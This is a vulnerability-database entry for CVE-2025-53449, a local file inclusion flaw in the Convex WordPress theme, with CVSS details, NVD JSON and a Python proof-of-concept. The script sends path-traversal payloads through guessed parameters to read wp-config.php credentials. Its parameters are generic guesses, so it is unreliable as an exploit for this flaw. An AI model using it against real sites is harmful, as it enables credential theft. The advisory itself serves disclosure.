Security Vulnerability Report
中文
CVE-2025-53449 CVSS 8.1 HIGH

CVE-2025-53449

Published: 2025-12-18 08:15:55
Last Modified: 2026-01-20 15:16:58

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Convex convex allows PHP Local File Inclusion.This issue affects Convex: from n/a through <= 1.11.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:convex:*:*:*:*:*:wordpress:*:* - VULNERABLE
Convex Theme <= 1.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-53449 PoC - WordPress Convex Theme LFI # Target: WordPress site with Convex theme <= 1.11 def exploit_lfi(target_url, filename='wp-config.php'): """ Exploit Local File Inclusion vulnerability in Convex theme """ # Common vulnerable parameters in Convex theme vulnerable_params = [ 'template', 'page', 'file', 'path', 'action', 'load', 'view' ] # Path traversal payload to read local files payload = f'../../../../../../../../{filename}%00' print(f'[*] Target: {target_url}') print(f'[*] Attempting to read: {filename}') for param in vulnerable_params: try: # Try common WordPress theme file inclusion patterns urls = [ f'{target_url}/?{param}={payload}', f'{target_url}/?{param}={payload}.php' ] for url in urls: response = requests.get(url, timeout=10) # Check for successful file read if response.status_code == 200: if 'DB_NAME' in response.text or '<?php' in response.text: print(f'[+] VULNERABLE! Parameter: {param}') print(f'[+] URL: {url}') print(f'[+] Content preview:') print(response.text[:500]) return True except requests.RequestException as e: print(f'[-] Error testing {param}: {e}') print('[-] Exploitation failed or target not vulnerable') return False # Example usage if __name__ == '__main__': target = 'http://target-site.com/wp-content/themes/convex' exploit_lfi(target, 'wp-config.php')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53449", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:55.403", "lastModified": "2026-01-20T15:16:58.197", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Convex convex allows PHP Local File Inclusion.This issue affects Convex: from n/a through <= 1.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:convex:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.11", "matchCriteriaId": "1E43D978-912F-4335-8B2B-22BA29073257"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/convex/vulnerability/wordpress-convex-theme-1-11-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}